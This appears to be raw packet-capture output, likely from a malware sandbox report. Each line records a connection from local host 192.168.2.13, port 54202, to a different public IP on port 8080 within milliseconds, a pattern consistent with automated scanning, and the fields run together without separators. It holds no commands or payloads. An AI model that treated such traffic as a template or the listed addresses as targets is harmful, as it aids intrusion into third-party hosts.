                                              Nov 23, 2023 05:14:50.632137060 CET542028080192.168.2.1395.61.20.7
                                              Nov 23, 2023 05:14:50.632148981 CET542028080192.168.2.1385.110.106.216
                                              Nov 23, 2023 05:14:50.632153034 CET542028080192.168.2.1385.24.251.113
                                              Nov 23, 2023 05:14:50.632155895 CET542028080192.168.2.1362.209.82.49
                                              Nov 23, 2023 05:14:50.632167101 CET542028080192.168.2.1362.195.143.55
                                              Nov 23, 2023 05:14:50.632174015 CET542028080192.168.2.1385.207.49.108
                                              Nov 23, 2023 05:14:50.632177114 CET542028080192.168.2.1362.68.196.92
                                              Nov 23, 2023 05:14:50.632177114 CET542028080192.168.2.1331.202.3.8
                                              Nov 23, 2023 05:14:50.632178068 CET542028080192.168.2.1331.117.71.47
                                              Nov 23, 2023 05:14:50.632178068 CET542028080192.168.2.1385.253.243.248
                                              Nov 23, 2023 05:14:50.632181883 CET542028080192.168.2.1385.225.58.115
                                              Nov 23, 2023 05:14:50.632189989 CET542028080192.168.2.1362.94.141.69
                                              Nov 23, 2023 05:14:50.632189989 CET542028080192.168.2.1331.120.82.83
                                              Nov 23, 2023 05:14:50.632198095 CET542028080192.168.2.1395.95.104.86
                                              Nov 23, 2023 05:14:50.632214069 CET542028080192.168.2.1331.99.89.115
                                              Nov 23, 2023 05:14:50.632216930 CET542028080192.168.2.1394.36.190.107
                                              Nov 23, 2023 05:14:50.632226944 CET542028080192.168.2.1331.179.51.174
                                              Nov 23, 2023 05:14:50.632232904 CET542028080192.168.2.1362.120.59.234
                                              Nov 23, 2023 05:14:50.632236004 CET542028080192.168.2.1331.104.222.103
                                              Nov 23, 2023 05:14:50.632251978 CET542028080192.168.2.1385.215.233.140
                                              Nov 23, 2023 05:14:50.632257938 CET542028080192.168.2.1331.11.247.53
                                              Nov 23, 2023 05:14:50.632261992 CET542028080192.168.2.1362.97.128.254
                                              Nov 23, 2023 05:14:50.632273912 CET542028080192.168.2.1362.148.148.88
                                              Nov 23, 2023 05:14:50.632275105 CET542028080192.168.2.1395.250.209.86
                                              Nov 23, 2023 05:14:50.632287979 CET542028080192.168.2.1394.142.82.227
                                              Nov 23, 2023 05:14:50.632292032 CET542028080192.168.2.1362.253.179.176
                                              Nov 23, 2023 05:14:50.632301092 CET542028080192.168.2.1362.165.25.0
                                              Nov 23, 2023 05:14:50.632306099 CET542028080192.168.2.1362.162.169.63
                                              Nov 23, 2023 05:14:50.632319927 CET542028080192.168.2.1394.31.229.14
                                              Nov 23, 2023 05:14:50.632322073 CET542028080192.168.2.1385.129.16.63
                                              Nov 23, 2023 05:14:50.632328033 CET542028080192.168.2.1394.3.65.88
                                              Nov 23, 2023 05:14:50.632335901 CET542028080192.168.2.1394.103.106.250
                                              Nov 23, 2023 05:14:50.632335901 CET542028080192.168.2.1395.162.65.12
                                              Nov 23, 2023 05:14:50.632354975 CET542028080192.168.2.1394.73.151.163
                                              Nov 23, 2023 05:14:50.632354975 CET542028080192.168.2.1385.126.53.216
                                              Nov 23, 2023 05:14:50.632356882 CET542028080192.168.2.1331.220.136.171
                                              Nov 23, 2023 05:14:50.632364035 CET542028080192.168.2.1362.52.220.95
                                              Nov 23, 2023 05:14:50.632366896 CET542028080192.168.2.1394.54.149.188
                                              Nov 23, 2023 05:14:50.632368088 CET542028080192.168.2.1362.206.138.135
                                              Nov 23, 2023 05:14:50.632368088 CET542028080192.168.2.1394.53.213.200
                                              Nov 23, 2023 05:14:50.632385015 CET542028080192.168.2.1331.191.248.217
                                              Nov 23, 2023 05:14:50.632385969 CET542028080192.168.2.1362.172.204.90
                                              Nov 23, 2023 05:14:50.632388115 CET542028080192.168.2.1362.204.72.146
                                              Nov 23, 2023 05:14:50.632405043 CET542028080192.168.2.1394.112.194.35
                                              Nov 23, 2023 05:14:50.632406950 CET542028080192.168.2.1331.238.30.130
                                              Nov 23, 2023 05:14:50.632406950 CET542028080192.168.2.1362.101.198.118
                                              Nov 23, 2023 05:14:50.632415056 CET542028080192.168.2.1385.190.121.116
                                              Nov 23, 2023 05:14:50.632415056 CET542028080192.168.2.1385.71.66.225
                                              Nov 23, 2023 05:14:50.632431030 CET542028080192.168.2.1394.125.38.152
                                              Nov 23, 2023 05:14:50.632431984 CET542028080192.168.2.1331.120.180.93
                                              Nov 23, 2023 05:14:50.632435083 CET542028080192.168.2.1362.22.173.108
                                              Nov 23, 2023 05:14:50.632447004 CET542028080192.168.2.1394.236.54.92
                                              Nov 23, 2023 05:14:50.632453918 CET542028080192.168.2.1395.59.85.124
                                              Nov 23, 2023 05:14:50.632453918 CET542028080192.168.2.1385.53.90.229
                                              Nov 23, 2023 05:14:50.632456064 CET542028080192.168.2.1394.133.141.0
                                              Nov 23, 2023 05:14:50.632472992 CET542028080192.168.2.1394.56.166.73
                                              Nov 23, 2023 05:14:50.632476091 CET542028080192.168.2.1385.197.212.72
                                              Nov 23, 2023 05:14:50.632476091 CET542028080192.168.2.1362.144.66.60
                                              Nov 23, 2023 05:14:50.632476091 CET542028080192.168.2.1331.247.46.162
                                              Nov 23, 2023 05:14:50.632487059 CET542028080192.168.2.1331.157.167.129
                                              Nov 23, 2023 05:14:50.632488966 CET542028080192.168.2.1331.41.180.62
                                              Nov 23, 2023 05:14:50.632499933 CET542028080192.168.2.1331.184.247.214
                                              Nov 23, 2023 05:14:50.632500887 CET542028080192.168.2.1331.203.53.114
                                              Nov 23, 2023 05:14:50.632508039 CET542028080192.168.2.1394.95.121.168
                                              Nov 23, 2023 05:14:50.632525921 CET542028080192.168.2.1362.138.223.0
                                              Nov 23, 2023 05:14:50.632529020 CET542028080192.168.2.1394.76.129.219
                                              Nov 23, 2023 05:14:50.632531881 CET542028080192.168.2.1385.200.56.215
                                              Nov 23, 2023 05:14:50.632531881 CET542028080192.168.2.1394.40.81.185
                                              Nov 23, 2023 05:14:50.632531881 CET542028080192.168.2.1362.115.0.56
                                              Nov 23, 2023 05:14:50.632546902 CET542028080192.168.2.1394.17.189.133
                                              Nov 23, 2023 05:14:50.632550001 CET542028080192.168.2.1331.213.0.97
                                              Nov 23, 2023 05:14:50.632550001 CET542028080192.168.2.1331.201.150.32
                                              Nov 23, 2023 05:14:50.632563114 CET542028080192.168.2.1385.75.16.14
                                              Nov 23, 2023 05:14:50.632570028 CET542028080192.168.2.1385.110.230.231
                                              Nov 23, 2023 05:14:50.632579088 CET542028080192.168.2.1385.48.77.190
                                              Nov 23, 2023 05:14:50.632582903 CET542028080192.168.2.1385.65.218.59
                                              Nov 23, 2023 05:14:50.632596970 CET542028080192.168.2.1394.139.29.66
                                              Nov 23, 2023 05:14:50.632603884 CET542028080192.168.2.1394.131.60.50
                                              Nov 23, 2023 05:14:50.632606983 CET542028080192.168.2.1395.204.7.42
                                              Nov 23, 2023 05:14:50.632606983 CET542028080192.168.2.1331.30.163.100
                                              Nov 23, 2023 05:14:50.632620096 CET542028080192.168.2.1385.135.199.4
                                              Nov 23, 2023 05:14:50.632623911 CET542028080192.168.2.1394.18.120.80
                                              Nov 23, 2023 05:14:50.632623911 CET542028080192.168.2.1385.9.167.162
                                              Nov 23, 2023 05:14:50.632639885 CET542028080192.168.2.1385.88.30.151
                                              Nov 23, 2023 05:14:50.632643938 CET542028080192.168.2.1395.93.211.242
                                              Nov 23, 2023 05:14:50.632647991 CET542028080192.168.2.1385.65.252.192
                                              Nov 23, 2023 05:14:50.632648945 CET542028080192.168.2.1394.118.228.231
                                              Nov 23, 2023 05:14:50.632664919 CET542028080192.168.2.1394.122.241.127
                                              Nov 23, 2023 05:14:50.632664919 CET542028080192.168.2.1395.26.154.7
                                              Nov 23, 2023 05:14:50.632664919 CET542028080192.168.2.1331.132.20.97
                                              Nov 23, 2023 05:14:50.632673979 CET542028080192.168.2.1331.180.183.62
                                              Nov 23, 2023 05:14:50.632674932 CET542028080192.168.2.1394.16.223.130
                                              Nov 23, 2023 05:14:50.632674932 CET542028080192.168.2.1362.113.150.136
                                              Nov 23, 2023 05:14:50.632688046 CET542028080192.168.2.1331.82.218.53
                                              Nov 23, 2023 05:14:50.632693052 CET542028080192.168.2.1362.232.103.155
                                              Nov 23, 2023 05:14:50.632702112 CET542028080192.168.2.1395.82.72.162
                                              Nov 23, 2023 05:14:50.632714987 CET542028080192.168.2.1362.237.133.136
                                              Nov 23, 2023 05:14:50.632715940 CET542028080192.168.2.1395.78.164.100
                                              Nov 23, 2023 05:14:50.632719040 CET542028080192.168.2.1394.232.219.41
                                              Nov 23, 2023 05:14:50.632728100 CET542028080192.168.2.1331.60.178.201
                                              Nov 23, 2023 05:14:50.632735014 CET542028080192.168.2.1331.30.70.54
                                              Nov 23, 2023 05:14:50.632740021 CET542028080192.168.2.1331.8.91.247
                                              Nov 23, 2023 05:14:50.632752895 CET542028080192.168.2.1362.54.221.109
                                              Nov 23, 2023 05:14:50.632757902 CET542028080192.168.2.1385.104.205.47
                                              Nov 23, 2023 05:14:50.632762909 CET542028080192.168.2.1362.114.208.81
                                              Nov 23, 2023 05:14:50.632762909 CET542028080192.168.2.1362.230.200.43
                                              Nov 23, 2023 05:14:50.632782936 CET542028080192.168.2.1395.220.251.58
                                              Nov 23, 2023 05:14:50.632785082 CET542028080192.168.2.1362.150.71.164
                                              Nov 23, 2023 05:14:50.632788897 CET542028080192.168.2.1395.159.173.196
                                              Nov 23, 2023 05:14:50.632788897 CET542028080192.168.2.1395.238.74.63
                                              Nov 23, 2023 05:14:50.632788897 CET542028080192.168.2.1362.91.113.20
                                              Nov 23, 2023 05:14:50.632797956 CET542028080192.168.2.1362.189.246.13
                                              Nov 23, 2023 05:14:50.632817984 CET542028080192.168.2.1395.114.95.113
                                              Nov 23, 2023 05:14:50.632817984 CET542028080192.168.2.1394.55.214.117
                                              Nov 23, 2023 05:14:50.632817984 CET542028080192.168.2.1395.178.12.48
                                              Nov 23, 2023 05:14:50.632821083 CET542028080192.168.2.1331.0.234.136
                                              Nov 23, 2023 05:14:50.632827997 CET542028080192.168.2.1331.97.175.39
                                              Nov 23, 2023 05:14:50.632842064 CET542028080192.168.2.1394.210.64.117
                                              Nov 23, 2023 05:14:50.632847071 CET542028080192.168.2.1362.103.3.25
                                              Nov 23, 2023 05:14:50.632847071 CET542028080192.168.2.1331.83.111.46
                                              Nov 23, 2023 05:14:50.632848978 CET542028080192.168.2.1362.45.203.223
                                              Nov 23, 2023 05:14:50.632848978 CET542028080192.168.2.1395.78.42.164
                                              Nov 23, 2023 05:14:50.632863998 CET542028080192.168.2.1394.33.131.146
                                              Nov 23, 2023 05:14:50.632868052 CET542028080192.168.2.1331.113.201.137
                                              Nov 23, 2023 05:14:50.632874012 CET542028080192.168.2.1331.114.0.249
                                              Nov 23, 2023 05:14:50.632884979 CET542028080192.168.2.1395.56.211.168
                                              Nov 23, 2023 05:14:50.632884979 CET542028080192.168.2.1331.51.114.141
                                              Nov 23, 2023 05:14:50.632885933 CET542028080192.168.2.1385.182.3.65
                                              Nov 23, 2023 05:14:50.632889032 CET542028080192.168.2.1395.251.160.221
                                              Nov 23, 2023 05:14:50.632899046 CET542028080192.168.2.1331.10.11.205
                                              Nov 23, 2023 05:14:50.632900000 CET542028080192.168.2.1395.208.31.68
                                              Nov 23, 2023 05:14:50.632908106 CET542028080192.168.2.1395.245.104.71
                                              Nov 23, 2023 05:14:50.632924080 CET542028080192.168.2.1394.8.197.169
                                              Nov 23, 2023 05:14:50.632924080 CET542028080192.168.2.1331.18.182.103
                                              Nov 23, 2023 05:14:50.632924080 CET542028080192.168.2.1331.109.174.239
                                              Nov 23, 2023 05:14:50.632926941 CET542028080192.168.2.1395.158.231.238
                                              Nov 23, 2023 05:14:50.632941008 CET542028080192.168.2.1395.211.0.107
                                              Nov 23, 2023 05:14:50.632941008 CET542028080192.168.2.1331.49.252.23
                                              Nov 23, 2023 05:14:50.632946014 CET542028080192.168.2.1331.67.213.151
                                              Nov 23, 2023 05:14:50.632950068 CET542028080192.168.2.1395.200.46.80
                                              Nov 23, 2023 05:14:50.632961035 CET542028080192.168.2.1394.131.204.88
                                              Nov 23, 2023 05:14:50.632977962 CET542028080192.168.2.1395.181.238.171
                                              Nov 23, 2023 05:14:50.632978916 CET542028080192.168.2.1385.241.240.3
                                              Nov 23, 2023 05:14:50.632982016 CET542028080192.168.2.1395.115.53.11
                                              Nov 23, 2023 05:14:50.632982969 CET542028080192.168.2.1362.255.23.30
                                              Nov 23, 2023 05:14:50.632987976 CET542028080192.168.2.1394.66.224.96
                                              Nov 23, 2023 05:14:50.632989883 CET542028080192.168.2.1362.58.139.42
                                              Nov 23, 2023 05:14:50.633004904 CET542028080192.168.2.1394.55.118.59
                                              Nov 23, 2023 05:14:50.633008003 CET542028080192.168.2.1394.27.213.94
                                              Nov 23, 2023 05:14:50.633012056 CET542028080192.168.2.1331.102.141.126
                                              Nov 23, 2023 05:14:50.633012056 CET542028080192.168.2.1331.242.20.68
                                              Nov 23, 2023 05:14:50.633016109 CET542028080192.168.2.1362.164.218.66
                                              Nov 23, 2023 05:14:50.633016109 CET542028080192.168.2.1331.118.206.196
                                              Nov 23, 2023 05:14:50.633025885 CET542028080192.168.2.1394.85.103.13
                                              Nov 23, 2023 05:14:50.633044958 CET542028080192.168.2.1394.143.250.68
                                              Nov 23, 2023 05:14:50.633045912 CET542028080192.168.2.1362.68.147.150
                                              Nov 23, 2023 05:14:50.633049011 CET542028080192.168.2.1395.150.245.161
                                              Nov 23, 2023 05:14:50.633058071 CET542028080192.168.2.1395.242.5.232
                                              Nov 23, 2023 05:14:50.633059025 CET542028080192.168.2.1385.97.27.160
                                              Nov 23, 2023 05:14:50.633064985 CET542028080192.168.2.1385.69.70.119
                                              Nov 23, 2023 05:14:50.633073092 CET542028080192.168.2.1395.251.179.166
                                              Nov 23, 2023 05:14:50.633081913 CET542028080192.168.2.1385.157.42.227
                                              Nov 23, 2023 05:14:50.633085966 CET542028080192.168.2.1331.34.189.31
                                              Nov 23, 2023 05:14:50.633097887 CET542028080192.168.2.1394.21.48.85
                                              Nov 23, 2023 05:14:50.633097887 CET542028080192.168.2.1362.157.198.131
                                              Nov 23, 2023 05:14:50.633099079 CET542028080192.168.2.1362.150.162.24
                                              Nov 23, 2023 05:14:50.633112907 CET542028080192.168.2.1394.247.223.30
                                              Nov 23, 2023 05:14:50.633116007 CET542028080192.168.2.1362.215.142.173
                                              Nov 23, 2023 05:14:50.633131027 CET542028080192.168.2.1395.80.24.225
                                              Nov 23, 2023 05:14:50.633131027 CET542028080192.168.2.1394.244.239.232
                                              Nov 23, 2023 05:14:50.633136034 CET542028080192.168.2.1331.82.123.52
                                              Nov 23, 2023 05:14:50.633145094 CET542028080192.168.2.1395.17.23.106
                                              Nov 23, 2023 05:14:50.633152962 CET542028080192.168.2.1394.10.24.178
                                              Nov 23, 2023 05:14:50.633152962 CET542028080192.168.2.1362.142.159.110
                                              Nov 23, 2023 05:14:50.633153915 CET542028080192.168.2.1362.153.53.97
                                              Nov 23, 2023 05:14:50.633157969 CET542028080192.168.2.1362.243.47.17
                                              Nov 23, 2023 05:14:50.633169889 CET542028080192.168.2.1395.28.145.198
                                              Nov 23, 2023 05:14:50.633172989 CET542028080192.168.2.1331.66.156.239
                                              Nov 23, 2023 05:14:50.633179903 CET542028080192.168.2.1395.241.5.10
                                              Nov 23, 2023 05:14:50.633181095 CET542028080192.168.2.1394.82.8.175
                                              Nov 23, 2023 05:14:50.633197069 CET542028080192.168.2.1385.161.130.243
                                              Nov 23, 2023 05:14:50.633198977 CET542028080192.168.2.1395.245.218.121
                                              Nov 23, 2023 05:14:50.633203030 CET542028080192.168.2.1385.221.78.14
                                              Nov 23, 2023 05:14:50.633203030 CET542028080192.168.2.1362.41.79.182
                                              Nov 23, 2023 05:14:50.633215904 CET542028080192.168.2.1395.170.215.15
                                              Nov 23, 2023 05:14:50.633218050 CET542028080192.168.2.1394.135.98.227
                                              Nov 23, 2023 05:14:50.633233070 CET542028080192.168.2.1362.103.158.109
                                              Nov 23, 2023 05:14:50.633238077 CET542028080192.168.2.1395.20.133.193
                                              Nov 23, 2023 05:14:50.633245945 CET542028080192.168.2.1394.177.249.156
                                              Nov 23, 2023 05:14:50.633245945 CET542028080192.168.2.1331.65.15.43
                                              Nov 23, 2023 05:14:50.633258104 CET542028080192.168.2.1385.195.141.93
                                              Nov 23, 2023 05:14:50.633259058 CET542028080192.168.2.1394.123.110.199
                                              Nov 23, 2023 05:14:50.633279085 CET542028080192.168.2.1331.213.129.235
                                              Nov 23, 2023 05:14:50.633280039 CET542028080192.168.2.1362.33.193.99
                                              Nov 23, 2023 05:14:50.633291006 CET542028080192.168.2.1394.147.169.183
                                              Nov 23, 2023 05:14:50.633299112 CET542028080192.168.2.1394.249.238.47
                                              Nov 23, 2023 05:14:50.633306026 CET542028080192.168.2.1331.195.113.55
                                              Nov 23, 2023 05:14:50.633306980 CET542028080192.168.2.1395.28.130.137
                                              Nov 23, 2023 05:14:50.633322954 CET542028080192.168.2.1331.103.75.79
                                              Nov 23, 2023 05:14:50.633326054 CET542028080192.168.2.1331.215.191.223
                                              Nov 23, 2023 05:14:50.633333921 CET542028080192.168.2.1394.128.243.245
                                              Nov 23, 2023 05:14:50.633341074 CET542028080192.168.2.1331.60.188.156
                                              Nov 23, 2023 05:14:50.633353949 CET542028080192.168.2.1362.168.53.169
                                              Nov 23, 2023 05:14:50.633356094 CET542028080192.168.2.1395.107.255.138
                                              Nov 23, 2023 05:14:50.633371115 CET542028080192.168.2.1395.83.131.26
                                              Nov 23, 2023 05:14:50.633383036 CET542028080192.168.2.1331.23.170.206
                                              Nov 23, 2023 05:14:50.633385897 CET542028080192.168.2.1362.19.76.28
                                              Nov 23, 2023 05:14:50.633398056 CET542028080192.168.2.1395.35.250.160
                                              Nov 23, 2023 05:14:50.633398056 CET542028080192.168.2.1385.234.104.239
                                              Nov 23, 2023 05:14:50.633409977 CET542028080192.168.2.1362.61.91.76
                                              Nov 23, 2023 05:14:50.633419991 CET542028080192.168.2.1385.210.81.178
                                              Nov 23, 2023 05:14:50.633420944 CET542028080192.168.2.1385.178.151.207
                                              Nov 23, 2023 05:14:50.633425951 CET542028080192.168.2.1394.83.148.84
                                              Nov 23, 2023 05:14:50.633425951 CET542028080192.168.2.1395.154.116.0
                                              Nov 23, 2023 05:14:50.633440971 CET542028080192.168.2.1362.42.222.15
                                              Nov 23, 2023 05:14:50.633447886 CET542028080192.168.2.1331.127.4.228
                                              Nov 23, 2023 05:14:50.633451939 CET542028080192.168.2.1394.81.254.54
                                              Nov 23, 2023 05:14:50.633456945 CET542028080192.168.2.1395.32.47.188
                                              Nov 23, 2023 05:14:50.633467913 CET542028080192.168.2.1395.254.141.242
                                              Nov 23, 2023 05:14:50.633481026 CET542028080192.168.2.1394.211.77.224
                                              Nov 23, 2023 05:14:50.633485079 CET542028080192.168.2.1331.232.230.184
                                              Nov 23, 2023 05:14:50.633490086 CET542028080192.168.2.1331.235.69.48
                                              Nov 23, 2023 05:14:50.633490086 CET542028080192.168.2.1395.80.70.189
                                              Nov 23, 2023 05:14:50.633508921 CET542028080192.168.2.1362.2.234.50
                                              Nov 23, 2023 05:14:50.633511066 CET542028080192.168.2.1385.13.67.253
                                              Nov 23, 2023 05:14:50.633512020 CET542028080192.168.2.1394.153.245.25
                                              Nov 23, 2023 05:14:50.633514881 CET542028080192.168.2.1394.235.42.225
                                              Nov 23, 2023 05:14:50.633527994 CET542028080192.168.2.1394.198.42.158
                                              Nov 23, 2023 05:14:50.633533001 CET542028080192.168.2.1395.0.250.111
                                              Nov 23, 2023 05:14:50.633537054 CET542028080192.168.2.1385.138.17.195
                                              Nov 23, 2023 05:14:50.633548975 CET542028080192.168.2.1395.161.81.79
                                              Nov 23, 2023 05:14:50.633560896 CET542028080192.168.2.1385.168.176.8
                                              Nov 23, 2023 05:14:50.633567095 CET542028080192.168.2.1362.50.5.153
                                              Nov 23, 2023 05:14:50.633579969 CET542028080192.168.2.1362.18.41.168
                                              Nov 23, 2023 05:14:50.633584976 CET542028080192.168.2.1385.84.113.128
                                              Nov 23, 2023 05:14:50.633588076 CET542028080192.168.2.1362.182.11.196
                                              Nov 23, 2023 05:14:50.633594990 CET542028080192.168.2.1394.88.213.210
                                              Nov 23, 2023 05:14:50.633594990 CET542028080192.168.2.1394.111.25.13
                                              Nov 23, 2023 05:14:50.633603096 CET542028080192.168.2.1331.174.245.231
                                              Nov 23, 2023 05:14:50.633615017 CET542028080192.168.2.1362.92.105.178
                                              Nov 23, 2023 05:14:50.633620977 CET542028080192.168.2.1362.40.129.181
                                              Nov 23, 2023 05:14:50.633625031 CET542028080192.168.2.1395.190.33.31
                                              Nov 23, 2023 05:14:50.633630991 CET542028080192.168.2.1362.81.169.240
                                              Nov 23, 2023 05:14:50.633639097 CET542028080192.168.2.1362.220.202.44
                                              Nov 23, 2023 05:14:50.633641005 CET542028080192.168.2.1395.66.0.234
                                              Nov 23, 2023 05:14:50.633649111 CET542028080192.168.2.1331.211.222.14
                                              Nov 23, 2023 05:14:50.633657932 CET542028080192.168.2.1394.91.222.120
                                              Nov 23, 2023 05:14:50.633672953 CET542028080192.168.2.1395.128.248.97
                                              Nov 23, 2023 05:14:50.633672953 CET542028080192.168.2.1395.250.216.64
                                              Nov 23, 2023 05:14:50.633680105 CET542028080192.168.2.1331.8.29.124
                                              Nov 23, 2023 05:14:50.633683920 CET542028080192.168.2.1394.43.220.93
                                              Nov 23, 2023 05:14:50.633686066 CET542028080192.168.2.1394.173.180.131
                                              Nov 23, 2023 05:14:50.633686066 CET542028080192.168.2.1362.45.142.182
                                              Nov 23, 2023 05:14:50.633697033 CET542028080192.168.2.1395.199.241.220
                                              Nov 23, 2023 05:14:50.633706093 CET542028080192.168.2.1331.78.187.84
                                              Nov 23, 2023 05:14:50.633707047 CET542028080192.168.2.1362.253.67.133
                                              Nov 23, 2023 05:14:50.633728027 CET542028080192.168.2.1362.77.233.18
                                              Nov 23, 2023 05:14:50.633728027 CET542028080192.168.2.1331.67.156.120
                                              Nov 23, 2023 05:14:50.633728981 CET542028080192.168.2.1395.233.172.44
                                              Nov 23, 2023 05:14:50.633728981 CET542028080192.168.2.1385.162.109.229
                                              Nov 23, 2023 05:14:50.633728981 CET542028080192.168.2.1331.114.59.54
                                              Nov 23, 2023 05:14:50.633744001 CET542028080192.168.2.1331.238.189.153
                                              Nov 23, 2023 05:14:50.633750916 CET542028080192.168.2.1395.19.175.146
                                              Nov 23, 2023 05:14:50.633757114 CET542028080192.168.2.1395.188.98.43
                                              Nov 23, 2023 05:14:50.633764982 CET542028080192.168.2.1395.60.206.93
                                              Nov 23, 2023 05:14:50.633764982 CET542028080192.168.2.1331.96.24.197
                                              Nov 23, 2023 05:14:50.633781910 CET542028080192.168.2.1331.79.35.22
                                              Nov 23, 2023 05:14:50.633781910 CET542028080192.168.2.1395.251.37.92
                                              Nov 23, 2023 05:14:50.633789062 CET542028080192.168.2.1385.149.53.7
                                              Nov 23, 2023 05:14:50.633802891 CET542028080192.168.2.1362.32.208.134
                                              Nov 23, 2023 05:14:50.633804083 CET542028080192.168.2.1385.225.154.3
                                              Nov 23, 2023 05:14:50.633807898 CET542028080192.168.2.1362.21.213.32
                                              Nov 23, 2023 05:14:50.633807898 CET542028080192.168.2.1385.111.172.0
                                              Nov 23, 2023 05:14:50.633816004 CET542028080192.168.2.1394.209.237.249
                                              Nov 23, 2023 05:14:50.633817911 CET542028080192.168.2.1385.48.196.123
                                              Nov 23, 2023 05:14:50.633822918 CET542028080192.168.2.1331.155.176.0
                                              Nov 23, 2023 05:14:50.633831978 CET542028080192.168.2.1394.116.166.68
                                              Nov 23, 2023 05:14:50.633847952 CET542028080192.168.2.1385.192.123.158
                                              Nov 23, 2023 05:14:50.633852005 CET542028080192.168.2.1331.2.243.0
                                              Nov 23, 2023 05:14:50.633867979 CET542028080192.168.2.1331.228.250.195
                                              Nov 23, 2023 05:14:50.633869886 CET542028080192.168.2.1394.241.100.162
                                              Nov 23, 2023 05:14:50.633869886 CET542028080192.168.2.1385.5.157.99
                                              Nov 23, 2023 05:14:50.633892059 CET542028080192.168.2.1362.95.125.0
                                              Nov 23, 2023 05:14:50.633892059 CET542028080192.168.2.1394.144.71.209
                                              Nov 23, 2023 05:14:50.633893967 CET542028080192.168.2.1385.87.80.212
                                              Nov 23, 2023 05:14:50.633902073 CET542028080192.168.2.1394.238.65.127
                                              Nov 23, 2023 05:14:50.633903027 CET542028080192.168.2.1362.116.4.19
                                              Nov 23, 2023 05:14:50.633903027 CET542028080192.168.2.1362.138.251.244
                                              Nov 23, 2023 05:14:50.633917093 CET542028080192.168.2.1385.123.24.191
                                              Nov 23, 2023 05:14:50.633924007 CET542028080192.168.2.1385.103.99.71
                                              Nov 23, 2023 05:14:50.633924007 CET542028080192.168.2.1331.138.144.229
                                              Nov 23, 2023 05:14:50.633925915 CET542028080192.168.2.1394.228.236.37
                                              Nov 23, 2023 05:14:50.633933067 CET542028080192.168.2.1331.174.63.40
                                              Nov 23, 2023 05:14:50.633940935 CET542028080192.168.2.1331.48.247.93
                                              Nov 23, 2023 05:14:50.633945942 CET542028080192.168.2.1362.198.147.144
                                              Nov 23, 2023 05:14:50.633949995 CET542028080192.168.2.1394.157.237.214
                                              Nov 23, 2023 05:14:50.633960009 CET542028080192.168.2.1394.153.190.175
                                              Nov 23, 2023 05:14:50.633961916 CET542028080192.168.2.1362.102.104.149
                                              Nov 23, 2023 05:14:50.633965969 CET542028080192.168.2.1362.96.55.238
                                              Nov 23, 2023 05:14:50.633977890 CET542028080192.168.2.1394.140.229.167
                                              Nov 23, 2023 05:14:50.633980036 CET542028080192.168.2.1331.97.245.191
                                              Nov 23, 2023 05:14:50.633991957 CET542028080192.168.2.1394.48.94.40
                                              Nov 23, 2023 05:14:50.633996964 CET542028080192.168.2.1395.192.114.225
                                              Nov 23, 2023 05:14:50.634001017 CET542028080192.168.2.1362.100.35.34
                                              Nov 23, 2023 05:14:50.634011984 CET542028080192.168.2.1331.219.84.66
                                              Nov 23, 2023 05:14:50.634013891 CET542028080192.168.2.1395.183.75.74
                                              Nov 23, 2023 05:14:50.634013891 CET542028080192.168.2.1394.169.32.48
                                              Nov 23, 2023 05:14:50.634032011 CET542028080192.168.2.1395.192.112.232
                                              Nov 23, 2023 05:14:50.634032011 CET542028080192.168.2.1362.51.35.240
                                              Nov 23, 2023 05:14:50.634035110 CET542028080192.168.2.1385.80.31.96
                                              Nov 23, 2023 05:14:50.634048939 CET542028080192.168.2.1331.24.81.137
                                              Nov 23, 2023 05:14:50.634051085 CET542028080192.168.2.1362.51.156.30
                                              Nov 23, 2023 05:14:50.634054899 CET542028080192.168.2.1362.74.18.122
                                              Nov 23, 2023 05:14:50.634063005 CET542028080192.168.2.1331.3.82.187
                                              Nov 23, 2023 05:14:50.634072065 CET542028080192.168.2.1385.140.89.80
                                              Nov 23, 2023 05:14:50.634085894 CET542028080192.168.2.1362.22.4.80
                                              Nov 23, 2023 05:14:50.634088993 CET542028080192.168.2.1395.58.30.57
                                              Nov 23, 2023 05:14:50.634088993 CET542028080192.168.2.1362.206.105.205
                                              Nov 23, 2023 05:14:50.634093046 CET542028080192.168.2.1385.140.120.43
                                              Nov 23, 2023 05:14:50.634099960 CET542028080192.168.2.1385.222.20.26
                                              Nov 23, 2023 05:14:50.634102106 CET542028080192.168.2.1362.108.113.73
                                              Nov 23, 2023 05:14:50.634118080 CET542028080192.168.2.1362.107.92.56
                                              Nov 23, 2023 05:14:50.634123087 CET542028080192.168.2.1394.244.122.87
                                              Nov 23, 2023 05:14:50.634124041 CET542028080192.168.2.1362.18.141.8
                                              Nov 23, 2023 05:14:50.634136915 CET542028080192.168.2.1331.123.209.40
                                              Nov 23, 2023 05:14:50.634138107 CET542028080192.168.2.1362.199.217.14
                                              Nov 23, 2023 05:14:50.634138107 CET542028080192.168.2.1331.134.220.177
                                              Nov 23, 2023 05:14:50.634146929 CET542028080192.168.2.1394.71.15.114
                                              Nov 23, 2023 05:14:50.634149075 CET542028080192.168.2.1331.96.50.83
                                              Nov 23, 2023 05:14:50.634156942 CET542028080192.168.2.1395.177.210.235
                                              Nov 23, 2023 05:14:50.634170055 CET542028080192.168.2.1394.70.220.163
                                              Nov 23, 2023 05:14:50.634172916 CET542028080192.168.2.1394.132.113.97
                                              Nov 23, 2023 05:14:50.634175062 CET542028080192.168.2.1362.211.225.18
                                              Nov 23, 2023 05:14:50.634181976 CET542028080192.168.2.1394.157.158.69
                                              Nov 23, 2023 05:14:50.634190083 CET542028080192.168.2.1395.199.94.65
                                              Nov 23, 2023 05:14:50.634198904 CET542028080192.168.2.1362.189.237.95
                                              Nov 23, 2023 05:14:50.634201050 CET542028080192.168.2.1331.196.114.104
                                              Nov 23, 2023 05:14:50.634215117 CET542028080192.168.2.1362.182.137.192
                                              Nov 23, 2023 05:14:50.634217978 CET542028080192.168.2.1385.32.142.238
                                              Nov 23, 2023 05:14:50.634222031 CET542028080192.168.2.1394.210.228.151
                                              Nov 23, 2023 05:14:50.634233952 CET542028080192.168.2.1331.87.141.74
                                              Nov 23, 2023 05:14:50.634238005 CET542028080192.168.2.1395.56.149.123
                                              Nov 23, 2023 05:14:50.634247065 CET542028080192.168.2.1385.168.114.102
                                              Nov 23, 2023 05:14:50.634258032 CET542028080192.168.2.1395.254.215.227
                                              Nov 23, 2023 05:14:50.634260893 CET542028080192.168.2.1394.11.29.97
                                              Nov 23, 2023 05:14:50.634263039 CET542028080192.168.2.1395.44.43.157
                                              Nov 23, 2023 05:14:50.634267092 CET542028080192.168.2.1362.132.18.82
                                              Nov 23, 2023 05:14:50.634279013 CET542028080192.168.2.1394.185.165.241
